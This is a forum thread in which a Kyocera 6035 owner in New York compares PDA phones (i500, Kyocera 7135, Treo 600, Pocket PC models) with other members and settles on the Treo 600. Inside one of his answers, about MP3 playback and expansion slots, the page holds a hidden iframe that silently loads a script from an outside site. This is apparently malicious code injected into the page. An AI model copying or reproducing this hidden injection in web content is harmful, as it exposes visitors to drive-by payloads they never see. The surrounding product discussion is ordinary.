I have had the Kyocera 6035 now for 2 years and have been very pleased with it but I now want more!
2. Are locked into a mobile carrier (i.e. Verizon Wireless, Sprint PCS, etc.), or do you prefer a particular carrier? Do you know if one carrier has better coverage in places that you need to be?
I currently use sprint but can switch--contract is up. Verizon could save me $ because I have verizon everything else.
3. Where are you based? Do you stay in one place or travel a lot? Do you travel internationally... how much and where? Do you intend to use your pdaPhone there?
I live and work in NYC. I travel locally here in NYC going to people's homes etc... so I use the phone and calendar features. Also, I ride the subway constantly so Mp3 and games are great.
4. Do have a preference of Palm, Pocket PC, Symbian, etc.?
I have used Palm happily now for 5 years but feel it's a bit limiting as far as multimedia. It would be great not to have to transfer data to a new operating system. I can hear the cursing now, but if the features were worth it then okay. PC appeals to me as a home PC user if it really works like a PC. Don't know much about Symbian but I am open to learn.
5. Are you likely to run it the way it came out of the box, or do you intend to load a whole lot of extra applications and stuff on it? Do you know of anything now that you will need to run?
I love to add stuff. Mp3!!! Games!!! Helpful programs you buy then don't use after a month, you know.
6. How important is data, and what would you use data for (i.e. web, email, remote terminal, etc.)?
I don't currently use the internet on my 6035 but I did when I first got it. Maybe if it was better, color, more like real computer browsing, I would use it more. Nonetheless, computers are everywhere so getting on the internet isn't hard.
7. Do you do SMS messaging a lot?
Never. Not even on my home computer. I would rather call the person. I assume this is like instant messages?
8. Do you need a GPS for mapping and navigation?
No, but the option in the future would be cool. More is better, lol.
9. What is your size preference.. very close to the smallest cellphone, or you don’t care.. function over size?
Tough question. I love the i500 by samsung because it is what I have now but SMALLER. That's great. If I could get the i505 I would be in heaven. If a pocket PC or Treo could be no larger than my 6035 I would like that too. The i700 is a little big but I like it very much. I am just worried that if I buy it in November when you can keep your ohone number and switch carriers, then a newer smaller one will come out. Any news on that?
10. How will you carry it... pocket, belt, purse, etc.?
I carry the 6035 on a belt in the summer and pocket in the winter. In the winter, bigger doesn't bother me because jacket pockets have lots of room but in the summer it drives me crazy because I have a brick on my belt. Can you carry a pocket PC on a belt and not kill it?
11. Do you prefer a particular form factor… flip-phone, candy bar, etc?
I don't think so. Exposed screens scare me a little. It scares me when a phone doesn't look like a phone. I guess it makes me feel that if it looks like a palm pilot, then that means that the phone will stink. I can change though.
12. Do you prefer a QWERTY keyboard, or are you cool with a stylus?
I have been a stylus user for a long time now so I can graffiti with the best of the them, but the treo 600 does look cool. One handed might be nice!
13. Do you want to play a lot of games? What kinds?
The 6035 has okay games but has been left in the dust. How far can Dopewars get you? It's fun but a nice game on color would be sweet. I love RPG games. I play Tiger Woods Golf alot too.
14. Do you want to listen to music? What kind... mp3, streamed, etc.?
I believe I do. If it really works like an mp3 player. I have read complaints about mp3 use on the new kyocera 7135. Halting etc...It would drive me crazy if I had an mp3 player and had to tweek it all the time just to listen to 10 minutes of music. Expansion slots are NICE!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Wow... you've provided a lot of info here. If you are comfortable with the 6035, then the obivious choice is the 7135.... it seems to do all the things you are looking for, but I sense that you might be restless with the Palm environment. I have just moved back to Palm after being on the Pocket PC for a while, and the only real complaints I have are the lack of real multitasking, and the smaller screen size. The screen size is not really a complaint, however, because I also like the smaller sized device... you can't have both.
You need to spend some time on a Pocket PC to get a feel for the user interface and determine if you like it or not. I wouldn't worry about the Contacts and Calendar apps, because you can get a replacement for them that is very good. I'd just look at the OS and how it operates. Find a CompUSA or similar store and spend an hour playing. While the interface is similar to a PC, it really isn't. For example, apps stay open when you hit the X in the upper corner. Media Player is pretty nice and built in, but there are good MP3 players for Palm as well. I think you can do most anything on the Palm, that you can on the Pocket PC... but the Pocket PC does get an edge for having a larger display ... for terminal emulation or spreadsheets this is important, and with watching movies; and for having a headstart on multimedia.
The Pocket PC Phones... the i700 and T-Mobile Phone Editoin... are really not a lot bigger than the 6035. I can post some comparison photos if you want, as I've got the T-Mob and a 6035. I'll try to do that later today. The i700 and T-Mob are almost exactly the same size. I carried one on my belt for a year. The G1000 may be pushing that, but it is still doable on a belt.
Upcoming for the Pocket PC the only thing I know of is the XDA II (available in the next 2 weeks in Europe... by year end for US), and the CDMA version of it that replaces the Thera. These are nice machines, but nearly identical in form to the XDA/T-Mob/SX56. So, there is no smaller Pocket PC Phone coming out. Microsoft dictates the minimum screen resolution, so that is going to hold the resolution at a certain point, and that will drive the screens to be a certain size. LG has announced a unique design that has a smaller physical screen size, and overall size... http://pdaphonehome.com/forums/showt...threadid=11391 . But I doubt we'll see it in the US, and if so, it will be a long time out.
You mentioned saving money going from Sprint to Verizon. I'd be very surprised if you could save money on that move. If you wanted to do the 7135, you'd have to go to Verizon though.
I was going to suggest the i500 to look at, and you beat me to that one. With the i500 you'll get a little more than you have in a much smaller package. It looks the most like a phone of all the pdaPhones based on Palm or Pocket PC. The MS Smartphone or Symbian devices will sway further toward the phone side. Neither of these has taken off in the US yet, but Motorola and AT&T just released a really MS Smartphone device.
Let me keep noodling and also see what others think.
Thanks for your quick reply and for the very helpful opinion and information. This is really a great forum, especially with folks like yourself.
When I first saw the 7135 I was drooling, then I saw the i500 and the small size impressed me.
A few quick questions I'm not sure I understand. Can the i500 run an mp3 third party device/software? Can my 6035? Obviously memory would be an issue without expansion slots. I believe the answer is no. If the i500 could play mp3, then I would be sold! Do you suggest the Treo 600? Has web browsing on a palm improved and does it look loke a mini computer screen?
For the lastest on specifics about the i500 or 7135, you will get more thorough answers in those forums. For MP3s, I believe the i500 is fine, but you will have an issue of no memory card. MP3s take up a lot of space, so this could be an issue.
The Treo 600 is pretty good, but it didn't pop into my head when I read your responses.. I'm using one now.
For web browsing, a couple of things are happening. The bandwidth has greatly improved and so have the browsers. I think that some of the best browsing will be on the Pocket PC platform because you have more real estate, and the ability to browse in landscape mode with certain software. The other thing that has changed is that there are so many pda enabled sites now (including this one), so that you are not trying to swallow a huge busy web page on a small screen. It is very quick and easy to use the web now to get quick info. I posted my original reply to you from my Treo... now I'm at my laptop again.
6035 compared to T-Mobile Pocket PC Phone Edition.... several views. There is a good T-Mobile to i700 comparison in the > pdaPhone Info > Articles section of the site.
I wanted to thank you all for your input. I have decided to give the Treo 600 a try. Sprint gave me a great deal to resign and I think I will like the one handed design of the Treo 600. The i500 was a close 2nd but I wanted more bang for my buck even if the size is a little bigger on the treo. The 7135 was just too big considering it didn't do as much as the Treo does. Plus, Verizon couldn't offer a better deal to go with them. It is a cool phone though. Not to mention changing my number, because I'm not sure if this whole take your number with you thing is going to be as easy as we think. We shall see. Thanks again! Jason
